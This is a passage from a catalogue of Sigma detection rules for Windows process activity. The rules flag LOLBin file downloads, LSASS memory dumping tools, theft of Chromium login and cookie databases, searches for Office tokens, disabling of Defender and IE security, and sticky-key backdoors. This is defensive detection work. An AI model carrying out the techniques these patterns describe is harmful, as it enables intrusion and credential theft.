- "\u02E3"
- "\u02EA"
- "\u02E2"
selection_unicode_hyphens:
CommandLine|contains:
- "\u2015"
- "\u2014"
selection_unicode_slashes:
CommandLine|contains:
- "\u2215"
- "\u2044"
Execution from Suspicious Folder
- source: sigma
- technicques:
- t1036
Description
Detects a suspicious execution from an uncommon folder
Detection logic
condition: selection and not 1 of filter_*
filter_citrix:
Image|endswith: \CitrixReceiverUpdater.exe
Image|startswith: C:\Windows\SysWOW64\config\systemprofile\Citrix\UpdaterBinaries\
filter_ibm:
Image|startswith: C:\Users\Public\IBM\ClientSolutions\Start_Programs\
selection:
- Image|contains:
- \$Recycle.bin\
- \config\systemprofile\
- \Intel\Logs\
- \RSA\MachineKeys\
- \Users\All Users\
- \Users\Default\
- \Users\NetworkService\
- \Users\Public\
- \Windows\addins\
- \Windows\debug\
- \Windows\Fonts\
- \Windows\Help\
- \Windows\IME\
- \Windows\Media\
- \Windows\repair\
- \Windows\security\
- \Windows\System32\Tasks\
- \Windows\Tasks\
- Image|startswith: C:\Perflogs\
Suspicious WmiPrvSE Child Process
- source: sigma
- technicques:
- t1047
- t1204
- t1204.002
- t1218
- t1218.010
Description
Detects suspicious and uncommon child processes of WmiPrvSE
Detection logic
condition: selection_parent and 1 of selection_children_* and not 1 of filter_main_*
filter_main_msiexec:
CommandLine|contains: '/i '
Image|endswith: \msiexec.exe
filter_main_werfault:
Image|endswith: \WerFault.exe
filter_main_wmiprvse:
Image|endswith: \WmiPrvSE.exe
selection_children_1:
Image|endswith:
- \certutil.exe
- \cscript.exe
- \mshta.exe
- \msiexec.exe
- \regsvr32.exe
- \rundll32.exe
- \verclsid.exe
- \wscript.exe
selection_children_2:
CommandLine|contains:
- cscript
- mshta
- powershell
- pwsh
- regsvr32
- rundll32
- wscript
Image|endswith: \cmd.exe
selection_parent:
ParentImage|endswith: \wbem\WmiPrvSE.exe
Suspicious Msbuild Execution By Uncommon Parent Process
- source: sigma
- technicques:
Description
Detects suspicious execution of ‘Msbuild.exe’ by a uncommon parent process
Detection logic
condition: selection and not filter_parent
filter_parent:
ParentImage|endswith:
- \devenv.exe
- \cmd.exe
- \msbuild.exe
- \python.exe
- \explorer.exe
- \nuget.exe
selection:
- Image|endswith: \MSBuild.exe
- OriginalFileName: MSBuild.exe
Remote File Download Via Findstr.EXE
- source: sigma
- technicques:
- t1105
- t1218
- t1552
- t1552.001
- t1564
- t1564.004
Description
Detects execution of “findstr” with specific flags and a remote share path. This specific set of CLI flags would allow “findstr” to download the content of the file located on the remote share as described in the LOLBAS entry.
Detection logic
condition: selection_findstr and all of selection_cli_download_*
selection_cli_download_1:
CommandLine|contains|windash: ' -v '
selection_cli_download_2:
CommandLine|contains|windash: ' -l '
selection_cli_download_3:
CommandLine|contains: \\\\
selection_findstr:
- CommandLine|contains: findstr
- Image|endswith: findstr.exe
- OriginalFileName: FINDSTR.EXE
Disabled IE Security Features
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
Detection logic
condition: 1 of selection*
selection1:
CommandLine|contains|all:
- ' -name IEHarden '
- ' -value 0 '
selection2:
CommandLine|contains|all:
- ' -name DEPOff '
- ' -value 1 '
selection3:
CommandLine|contains|all:
- ' -name DisableFirstRunCustomize '
- ' -value 2 '
Potential Download/Upload Activity Using Type Command
- source: sigma
- technicques:
- t1105
Description
Detects usage of the “type” command to download/upload data from WebDAV server
Detection logic
condition: 1 of selection_*
selection_download:
CommandLine|contains|all:
- type \\\\
- ' > '
selection_upload:
CommandLine|contains|all:
- 'type '
- ' > \\\\'
Potential Arbitrary Command Execution Via FTP.EXE
- source: sigma
- technicques:
- t1059
- t1202
Description
Detects execution of “ftp.exe” script with the “-s” or “/s” flag and any child processes ran by “ftp.exe”.
Detection logic
condition: selection_parent or all of selection_child_*
selection_child_cli:
CommandLine|contains|windash: '-s:'
selection_child_img:
- Image|endswith: \ftp.exe
- OriginalFileName: ftp.exe
selection_parent:
ParentImage|endswith: \ftp.exe
Arbitrary File Download Via IMEWDBLD.EXE
- source: sigma
- technicques:
- t1218
Description
Detects usage of “IMEWDBLD.exe” to download arbitrary files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- http://
- https://
selection_img:
- Image|endswith: \IMEWDBLD.exe
- OriginalFileName: imewdbld.exe
Suspicious Invoke-WebRequest Execution
- source: sigma
- technicques:
- t1105
Description
Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
Detection logic
condition: all of selection_*
selection_commands:
CommandLine|contains:
- 'curl '
- Invoke-WebRequest
- 'iwr '
- 'wget '
selection_flags:
CommandLine|contains:
- ' -ur'
- ' -o'
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
selection_susp_locations:
CommandLine|contains:
- \AppData\
- \Desktop\
- \Temp\
- \Users\Public\
- '%AppData%'
- '%Public%'
- '%Temp%'
- '%tmp%'
- :\Windows\
Suspicious Rundll32 Execution With Image Extension
- source: sigma
- technicques:
- t1218
- t1218.011
Description
Detects the execution of Rundll32.exe with DLL files masquerading as image files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- .bmp
- .cr2
- .eps
- .gif
- .ico
- .jpeg
- .jpg
- .nef
- .orf
- .png
- .raw
- .sr2
- .tif
- .tiff
selection_img:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.exe
Remote Code Execute via Winrm.vbs
- source: sigma
- technicques:
- t1216
Description
Detects an attempt to execute code or create service on remote host via winrm.vbs.
Detection logic
condition: all of selection*
selection_cli:
CommandLine|contains|all:
- winrm
- invoke Create wmicimv2/Win32_
- -r:http
selection_img:
- Image|endswith: \cscript.exe
- OriginalFileName: cscript.exe
Suspicious DLL Loaded via CertOC.EXE
- source: sigma
- technicques:
- t1218
Description
Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|windash: ' -LoadDLL '
selection_img:
- Image|endswith: \certoc.exe
- OriginalFileName: CertOC.exe
selection_paths:
CommandLine|contains:
- \Appdata\Local\Temp\
- \Desktop\
- \Downloads\
- \Users\Public\
- C:\Windows\Tasks\
- C:\Windows\Temp\
Assembly Loading Via CL_LoadAssembly.ps1
- source: sigma
- technicques:
- t1216
Description
Detects calls to “LoadAssemblyFromPath” or “LoadAssemblyFromNS” that are part of the “CL_LoadAssembly.ps1” script. This can be abused to load different assemblies and bypass App locker controls.
Detection logic
condition: selection
selection:
CommandLine|contains:
- 'LoadAssemblyFromPath '
- 'LoadAssemblyFromNS '
HackTool - HandleKatz LSASS Dumper Execution
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same
Detection logic
condition: 1 of selection_*
selection_flags:
CommandLine|contains:
- .dmp
- lsass
- .obf
- dump
CommandLine|contains|all:
- '--pid:'
- '--outfile:'
selection_loader_img:
CommandLine|contains: '--pid:'
Image|endswith: \loader.exe
selection_loader_imphash:
- Imphash:
- 38d9e015591bbfd4929e0d0f47fa0055
- 0e2216679ca6e1094d63322e3412d650
- Hashes|contains:
- IMPHASH=38D9E015591BBFD4929E0D0F47FA0055
- IMPHASH=0E2216679CA6E1094D63322E3412D650
Uncommon Child Process Of BgInfo.EXE
- source: sigma
- technicques:
- t1059
- t1059.005
- t1202
- t1218
Description
Detects uncommon child processes of “BgInfo.exe” which could be a sign of potential abuse of the binary to proxy execution via external VBScript
Detection logic
condition: selection
selection:
ParentImage|endswith:
- \bginfo.exe
- \bginfo64.exe
Potentially Suspicious Child Process Of ClickOnce Application
- source: sigma
- technicques:
Description
Detects potentially suspicious child processes of a ClickOnce deployment application
Detection logic
condition: selection
selection:
Image|endswith:
- \calc.exe
- \cmd.exe
- \cscript.exe
- \explorer.exe
- \mshta.exe
- \net.exe
- \net1.exe
- \nltest.exe
- \notepad.exe
- \powershell.exe
- \pwsh.exe
- \reg.exe
- \regsvr32.exe
- \rundll32.exe
- \schtasks.exe
- \werfault.exe
- \wscript.exe
ParentImage|contains: \AppData\Local\Apps\2.0\
Suspicious Process Execution From Fake Recycle.Bin Folder
- source: sigma
- technicques:
Description
Detects process execution from a fake recycle bin folder, often used to avoid security solution.
Detection logic
condition: selection
selection:
Image|contains:
- RECYCLERS.BIN\
- RECYCLER.BIN\
Always Install Elevated MSI Spawned Cmd And Powershell
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects Windows Installer service (msiexec.exe) spawning “cmd” or “powershell”
Detection logic
condition: all of selection_*
selection_img:
- Image|endswith:
- \cmd.exe
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- Cmd.Exe
- PowerShell.EXE
- pwsh.dll
selection_parent:
ParentImage|contains|all:
- \Windows\Installer\
- msi
ParentImage|endswith: tmp
File Decoded From Base64/Hex Via Certutil.EXE
- source: sigma
- technicques:
- t1027
Description
Detects the execution of certutil with either the “decode” or “decodehex” flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|windash:
- '-decode '
- '-decodehex '
selection_img:
- Image|endswith: \certutil.exe
- OriginalFileName: CertUtil.exe
Abusing Print Executable
- source: sigma
- technicques:
- t1218
Description
Attackers can use print.exe for remote file copy
Detection logic
condition: selection and not filter_print
filter_print:
CommandLine|contains: print.exe
selection:
CommandLine|contains|all:
- /D
- .exe
CommandLine|startswith: print
Image|endswith: \print.exe
Process Access via TrolleyExpress Exclusion
- source: sigma
- technicques:
- t1003
- t1003.001
- t1218
- t1218.011
Description
Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
Detection logic
condition: selection or ( renamed and not 1 of filter* )
filter_empty:
OriginalFileName: null
filter_renamed:
OriginalFileName|contains: CtxInstall
renamed:
Image|endswith: \TrolleyExpress.exe
selection:
CommandLine|contains:
- \TrolleyExpress 7
- \TrolleyExpress 8
- \TrolleyExpress 9
- \TrolleyExpress.exe 7
- \TrolleyExpress.exe 8
- \TrolleyExpress.exe 9
- '\TrolleyExpress.exe -ma '
HackTool - RedMimicry Winnti Playbook Execution
- source: sigma
- technicques:
- t1059
- t1059.003
- t1106
- t1218
- t1218.011
Description
Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
Detection logic
condition: selection
selection:
CommandLine|contains:
- gthread-3.6.dll
- \Windows\Temp\tmp.bat
- sigcmm-2.4.dll
Image|endswith:
- \rundll32.exe
- \cmd.exe
Suspicious XOR Encoded PowerShell Command
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
- t1140
Description
Detects presence of a potentially xor encoded powershell command
Detection logic
condition: all of selection_*
selection_cli_other:
CommandLine|contains:
- ForEach
- for(
- 'for '
- '-join '
- -join'
- -join"
- -join`
- ::Join
- '[char]'
selection_cli_xor:
CommandLine|contains: bxor
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
- Description: Windows PowerShell
- Product: PowerShell Core 6
Recon Command Output Piped To Findstr.EXE
- source: sigma
- technicques:
- t1057
Description
Detects the excution of a potential recon command where the results are piped to “findstr”. This is meant to trigger on inline calls of “cmd.exe” via the “/c” or “/k” for example. Attackers often time use this to extract specific information they require in their chain.
Detection logic
condition: selection
selection:
CommandLine|contains:
- 'ipconfig /all | find '
- 'ipconfig /all | findstr '
- 'ipconfig | find '
- 'ipconfig | findstr '
- 'ipconfig.exe /all | find '
- 'ipconfig.exe /all | findstr '
- 'ipconfig.exe | find '
- 'ipconfig.exe | findstr '
- net start | find
- net start | findstr
- net.exe start | find
- net.exe start | findstr
- net1 start | find
- net1 start | findstr
- net1.exe start | find
- net1.exe start | findstr
- netstat -ano | find
- netstat -ano | findstr
- netstat | find
- netstat | findstr
- netstat.exe -ano | find
- netstat.exe -ano | findstr
- netstat.exe | find
- netstat.exe | findstr
- ping | find
- ping | findstr
- ping.exe | find
- ping.exe | findstr
- 'systeminfo | find '
- 'systeminfo | findstr '
- 'systeminfo.exe | find '
- 'systeminfo.exe | findstr '
- 'tasklist | find '
- 'tasklist | findstr '
- 'tasklist.exe | find '
- 'tasklist.exe | findstr '
- 'whoami /all | find '
- 'whoami /all | findstr '
- 'whoami.exe /all | find '
- 'whoami.exe /all | findstr '
Wusa.EXE Executed By Parent Process Located In Suspicious Location
- source: sigma
- technicques:
Description
Detects execution of the “wusa.exe” (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
Detection logic
condition: selection_img and 1 of selection_paths_*
selection_img:
Image|endswith: \wusa.exe
selection_paths_1:
ParentImage|contains:
- :\Perflogs\
- :\Users\Public\
- :\Windows\Temp\
- \Appdata\Local\Temp\
- \Temporary Internet
selection_paths_2:
- ParentImage|contains|all:
- :\Users\
- \Favorites\
- ParentImage|contains|all:
- :\Users\
- \Favourites\
- ParentImage|contains|all:
- :\Users\
- \Contacts\
- ParentImage|contains|all:
- :\Users\
- \Pictures\
Potential Arbitrary Command Execution Using Msdt.EXE
- source: sigma
- technicques:
- t1202
Description
Detects processes leveraging the “ms-msdt” handler or the “msdt.exe” binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
Detection logic
condition: selection_img and (selection_cmd_inline or all of selection_cmd_answerfile_*)
selection_cmd_answerfile_flag:
CommandLine|contains: ' PCWDiagnostic'
selection_cmd_answerfile_param:
CommandLine|contains|windash: ' -af '
selection_cmd_inline:
CommandLine|contains: IT_BrowseForFile=
selection_img:
- Image|endswith: \msdt.exe
- OriginalFileName: msdt.exe
HackTool - CreateMiniDump Execution
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker’s machine
Detection logic
condition: selection
selection:
- Image|endswith: \CreateMiniDump.exe
- Imphash: 4a07f944a83e8a7c2525efa35dd30e2f
- Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f
Windows Defender Definition Files Removed
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- ' -RemoveDefinitions'
- ' -All'
selection_img:
- Image|endswith: \MpCmdRun.exe
- OriginalFileName: MpCmdRun.exe
MpiExec Lolbin
- source: sigma
- technicques:
- t1218
Description
Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
Detection logic
condition: all of selection*
selection_binary:
- Image|endswith: \mpiexec.exe
- Imphash: d8b52ef6aaa3a81501bdfff9dbb96217
- Hashes|contains: IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217
selection_flags:
CommandLine|contains:
- ' /n 1 '
- ' -n 1 '
Tor Client/Browser Execution
- source: sigma
- technicques:
- t1090
- t1090.003
Description
Detects the use of Tor or Tor-Browser to connect to onion routing networks
Detection logic
condition: selection
selection:
Image|endswith:
- \tor.exe
- \Tor Browser\Browser\firefox.exe
New Process Created Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects new process creation using WMIC via the “process call create” flag
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- process
- call
- create
selection_img:
- Image|endswith: \wmic.exe
- OriginalFileName: wmic.exe
Suspicious Debugger Registration Cmdline
- source: sigma
- technicques:
- t1546
- t1546.008
Description
Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
Detection logic
condition: all of selection*
selection1:
CommandLine|contains: \CurrentVersion\Image File Execution Options\
selection2:
CommandLine|contains:
- sethc.exe
- utilman.exe
- osk.exe
- magnify.exe
- narrator.exe
- displayswitch.exe
- atbroker.exe
- HelpPane.exe
DllUnregisterServer Function Call Via Msiexec.EXE
- source: sigma
- technicques:
- t1218
- t1218.007
Description
Detects MsiExec loading a DLL and calling its DllUnregisterServer function
Detection logic
condition: all of selection_*
selection_dll:
CommandLine|contains: .dll
selection_flag:
CommandLine|contains|windash: ' -z '
selection_img:
- Image|endswith: \msiexec.exe
- OriginalFileName: \msiexec.exe
Suspicious Office Token Search Via CLI
- source: sigma
- technicques:
- t1528
Description
Detects possible search for office tokens via CLI by looking for the string “eyJ0eX”. This string is used as an anchor to look for the start of the JWT token used by office and similar apps.
Detection logic
condition: selection
selection:
CommandLine|contains:
- eyJ0eXAiOi
- ' eyJ0eX'
- ' "eyJ0eX"'
- ' ''eyJ0eX'''
DLL Loaded via CertOC.EXE
- source: sigma
- technicques:
- t1218
Description
Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|windash: ' -LoadDLL '
selection_img:
- Image|endswith: \certoc.exe
- OriginalFileName: CertOC.exe
TrustedPath UAC Bypass Pattern
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects indicators of a UAC bypass method by mocking directories
Detection logic
condition: selection
selection:
Image|contains: C:\Windows \System32\
RunDLL32 Spawning Explorer
- source: sigma
- technicques:
- t1218
- t1218.011
Description
Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
Detection logic
condition: selection and not filter
filter:
ParentCommandLine|contains: \shell32.dll,Control_RunDLL
selection:
Image|endswith: \explorer.exe
ParentImage|endswith: \rundll32.exe
Potential Arbitrary File Download Using Office Application
- source: sigma
- technicques:
- t1202
Description
Detects potential arbitrary file download using a Microsoft Office application
Detection logic
condition: all of selection_*
selection_http:
CommandLine|contains:
- http://
- https://
selection_img:
- Image|endswith:
- \EXCEL.EXE
- \POWERPNT.EXE
- \WINWORD.exe
- OriginalFileName:
- Excel.exe
- POWERPNT.EXE
- WinWord.exe
Potentially Suspicious Call To Win32_NTEventlogFile Class
- source: sigma
- technicques:
Description
Detects usage of the WMI class “Win32_NTEventlogFile” in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
Detection logic
condition: all of selection_*
selection_class:
CommandLine|contains: Win32_NTEventlogFile
selection_function:
CommandLine|contains:
- .BackupEventlog(
- .ChangeSecurityPermissions(
- .ChangeSecurityPermissionsEx(
- .ClearEventLog(
- .Delete(
- .DeleteEx(
- .Rename(
- .TakeOwnerShip(
- .TakeOwnerShipEx(
Obfuscated IP Via CLI
- source: sigma
- technicques:
Description
Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
Detection logic
condition: selection_img and 1 of selection_ip_* and not 1 of filter_main_*
filter_main_valid_ip:
CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4}
selection_img:
Image|endswith:
- \ping.exe
- \arp.exe
selection_ip_1:
CommandLine|contains:
- ' 0x'
- //0x
- .0x
- .00x
selection_ip_2:
CommandLine|contains|all:
- http://%
- '%2e'
selection_ip_3:
- CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4}
- CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7}
- CommandLine|re: https?://0[0-9]{3,11}
- CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11}
- CommandLine|re: https?://0[0-9]{1,11}
- CommandLine|re: ' [0-7]{7,13}'
Remote Access Tool - RURAT Execution From Unusual Location
- source: sigma
- technicques:
Description
Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of ‘C:\Program Files’)
Detection logic
condition: selection and not filter
filter:
Image|startswith:
- C:\Program Files\Remote Utilities
- C:\Program Files (x86)\Remote Utilities
selection:
- Image|endswith:
- \rutserv.exe
- \rfusclient.exe
- Product: Remote Utilities
Potential RDP Tunneling Via SSH
- source: sigma
- technicques:
- t1572
Description
Execution of ssh.exe to perform data exfiltration and tunneling through RDP
Detection logic
condition: selection
selection:
CommandLine|contains: :3389
Image|endswith: \ssh.exe
Powershell Inline Execution From A File
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects inline execution of PowerShell code from a file
Detection logic
condition: all of selection_*
selection_exec:
CommandLine|contains:
- 'iex '
- 'Invoke-Expression '
- 'Invoke-Command '
- 'icm '
selection_raw:
CommandLine|contains: ' -raw'
selection_read:
CommandLine|contains:
- 'cat '
- 'get-content '
- 'type '
WebDav Client Execution Via Rundll32.EXE
- source: sigma
- technicques:
- t1048
- t1048.003
Description
Detects “svchost.exe” spawning “rundll32.exe” with command arguments like “C:\windows\system32\davclnt.dll,DavSetCookie”. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie
selection_img:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
selection_parent:
ParentImage|endswith: \svchost.exe
File Download via CertOC.EXE
- source: sigma
- technicques:
- t1105
Description
Detects when a user downloads a file by using CertOC.exe
Detection logic
condition: all of selection*
selection_cli:
CommandLine|contains|all:
- -GetCACAPS
- http
selection_img:
- Image|endswith: \certoc.exe
- OriginalFileName: CertOC.exe
Renamed AutoIt Execution
- source: sigma
- technicques:
- t1027
Description
Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.
Detection logic
condition: 1 of selection_* and not 1 of filter_main_*
filter_main_legit_name:
Image|endswith:
- \AutoIt.exe
- \AutoIt2.exe
- \AutoIt3_x64.exe
- \AutoIt3.exe
selection_1:
CommandLine|contains:
- ' /AutoIt3ExecuteScript'
- ' /ErrorStdOut'
selection_2:
- Imphash:
- fdc554b3a8683918d731685855683ddf
- cd30a61b60b3d60cecdb034c8c83c290
- f8a00c72f2d667d2edbb234d0c0ae000
- Hashes|contains:
- IMPHASH=FDC554B3A8683918D731685855683DDF
- IMPHASH=CD30A61B60B3D60CECDB034C8C83C290
- IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000
selection_3:
OriginalFileName:
- AutoIt3.exe
- AutoIt2.exe
- AutoIt.exe
Potential Persistence Via Netsh Helper DLL
- source: sigma
- technicques:
- t1546
- t1546.007
Description
Detects the execution of netsh with “add helper” flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- add
- helper
selection_img:
- OriginalFileName: netsh.exe
- Image|endswith: \netsh.exe
Curl Web Request With Potential Custom User-Agent
- source: sigma
- technicques:
Description
Detects execution of “curl.exe” with a potential custom “User-Agent”. Attackers can leverage this to download or exfiltrate data via “curl” to a domain that only accept specific “User-Agent” strings
Detection logic
condition: all of selection_*
selection_header:
CommandLine|contains: 'User-Agent:'
CommandLine|re: \s-H\s
selection_img:
- Image|endswith: \curl.exe
- OriginalFileName: curl.exe
Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
- source: sigma
- technicques:
- t1562
- t1562.004
Description
Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
Detection logic
condition: all of selection_*
selection_cli:
- CommandLine|contains|all:
- firewall
- add
- allowedprogram
- CommandLine|contains|all:
- advfirewall
- firewall
- add
- rule
- action=allow
- program=
selection_img:
- Image|endswith: \netsh.exe
- OriginalFileName: netsh.exe
selection_paths:
CommandLine|contains:
- :\$Recycle.bin\
- :\RECYCLER.BIN\
- :\RECYCLERS.BIN\
- :\SystemVolumeInformation\
- :\Temp\
- :\Users\Default\
- :\Users\Desktop\
- :\Users\Public\
- :\Windows\addins\
- :\Windows\cursors\
- :\Windows\debug\
- :\Windows\drivers\
- :\Windows\fonts\
- :\Windows\help\
- :\Windows\system32\tasks\
- :\Windows\Tasks\
- :\Windows\Temp\
- \Downloads\
- \Local Settings\Temporary Internet Files\
- \Temporary Internet Files\Content.Outlook\
- '%Public%\'
- '%TEMP%'
- '%TMP%'
PowerShell Script Change Permission Via Set-Acl
- source: sigma
- technicques:
Description
Detects PowerShell execution to set the ACL of a file or a folder
Detection logic
condition: all of selection_*
selection_cmdlet:
CommandLine|contains|all:
- 'Set-Acl '
- '-AclObject '
- '-Path '
selection_img:
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
- Image|endswith:
- \powershell.exe
- \pwsh.exe
LSASS Process Reconnaissance Via Findstr.EXE
- source: sigma
- technicques:
- t1552
- t1552.006
Description
Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
Detection logic
condition: all of selection_findstr_* or selection_special
selection_findstr_cli:
CommandLine|contains: lsass
selection_findstr_img:
- Image|endswith:
- \find.exe
- \findstr.exe
- OriginalFileName:
- FIND.EXE
- FINDSTR.EXE
selection_special:
CommandLine|contains:
- ' /i "lsass'
- ' /i lsass.exe'
- findstr "lsass
- findstr lsass
- findstr.exe "lsass
- findstr.exe lsass
PUA - AdvancedRun Suspicious Execution
- source: sigma
- technicques:
- t1134
- t1134.002
Description
Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
Detection logic
condition: all of selection*
selection:
CommandLine|contains:
- /EXEFilename
- /CommandLine
selection_runas:
- CommandLine|contains:
- ' /RunAs 8 '
- ' /RunAs 4 '
- ' /RunAs 10 '
- ' /RunAs 11 '
- CommandLine|endswith:
- /RunAs 8
- /RunAs 4
- /RunAs 10
- /RunAs 11
Screen Capture Activity Via Psr.EXE
- source: sigma
- technicques:
- t1113
Description
Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
Detection logic
condition: selection
selection:
CommandLine|contains:
- /start
- -start
Image|endswith: \Psr.exe
SQLite Chromium Profile Data DB Access
- source: sigma
- technicques:
- t1005
- t1539
- t1555
- t1555.003
Description
Detect usage of the “sqlite” binary to query databases in Chromium-based browsers for potential data stealing.
Detection logic
condition: all of selection_*
selection_chromium:
CommandLine|contains:
- \User Data\
- \Opera Software\
- \ChromiumViewer\
selection_data:
CommandLine|contains:
- Login Data
- Cookies
- Web Data
- History
- Bookmarks
selection_sql:
- Product: SQLite
- Image|endswith:
- \sqlite.exe
- \sqlite3.exe
Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
- source: sigma
- technicques:
- t1218
- t1218.009
Description
Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
Detection logic
condition: all of selection_*
selection_extension:
CommandLine|contains:
- .dat
- .gif
- .jpeg
- .jpg
- .png
- .txt
selection_img:
- Image|endswith:
- \Regsvcs.exe
- \Regasm.exe
- OriginalFileName:
- RegSvcs.exe
- RegAsm.exe
Cmd.EXE Missing Space Characters Execution Anomaly
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer).
Detection logic
condition: 1 of selection* and not 1 of filter_*
filter_fp:
- CommandLine|contains: AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules
- CommandLine|endswith: cmd.exe/c .
- CommandLine: cmd.exe /c
filter_generic:
CommandLine|contains:
- 'cmd.exe /c '
- 'cmd /c '
- 'cmd.exe /k '
- 'cmd /k '
- 'cmd.exe /r '
- 'cmd /r '
selection1:
CommandLine|contains:
- cmd.exe/c
- \cmd/c
- '"cmd/c'
- cmd.exe/k
- \cmd/k
- '"cmd/k'
- cmd.exe/r
- \cmd/r
- '"cmd/r'
selection2:
CommandLine|contains:
- /cwhoami
- /cpowershell
- /cschtasks
- /cbitsadmin
- /ccertutil
- /kwhoami
- /kpowershell
- /kschtasks
- /kbitsadmin
- /kcertutil
selection3:
CommandLine|contains:
- cmd.exe /c
- cmd /c
- cmd.exe /k
- cmd /k
- cmd.exe /r
- cmd /r
Suspicious Microsoft Office Child Process
- source: sigma
- technicques:
- t1047
- t1204
- t1204.002
- t1218
- t1218.010
Description
Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
Detection logic
condition: selection_parent and 1 of selection_child_*
selection_child_processes:
- OriginalFileName:
- bitsadmin.exe
- CertOC.exe
- CertUtil.exe
- Cmd.Exe
- CMSTP.EXE
- cscript.exe
- curl.exe
- HH.exe
- IEExec.exe
- InstallUtil.exe
- javaw.exe
- Microsoft.Workflow.Compiler.exe
- msdt.exe
- MSHTA.EXE
- msiexec.exe
- Msxsl.exe
- odbcconf.exe
- pcalua.exe
- PowerShell.EXE
- RegAsm.exe
- RegSvcs.exe
- REGSVR32.exe
- RUNDLL32.exe
- schtasks.exe
- ScriptRunner.exe
- wmic.exe
- WorkFolders.exe
- wscript.exe
- Image|endswith:
- \AppVLP.exe
- \bash.exe
- \bitsadmin.exe
- \certoc.exe
- \certutil.exe
- \cmd.exe
- \cmstp.exe
- \control.exe
- \cscript.exe
- \curl.exe
- \forfiles.exe
- \hh.exe
- \ieexec.exe
- \installutil.exe
- \javaw.exe
- \mftrace.exe
- \Microsoft.Workflow.Compiler.exe
- \msbuild.exe
- \msdt.exe
- \mshta.exe
- \msidb.exe
- \msiexec.exe
- \msxsl.exe
- \odbcconf.exe
- \pcalua.exe
- \powershell.exe
- \pwsh.exe
- \regasm.exe
- \regsvcs.exe
- \regsvr32.exe
- \rundll32.exe
- \schtasks.exe
- \scrcons.exe
- \scriptrunner.exe
- \sh.exe
- \svchost.exe
- \verclsid.exe
- \wmic.exe
- \workfolders.exe
- \wscript.exe
selection_child_susp_paths:
Image|contains:
- \AppData\
- \Users\Public\
- \ProgramData\
- \Windows\Tasks\
- \Windows\Temp\
- \Windows\System32\Tasks\
selection_parent:
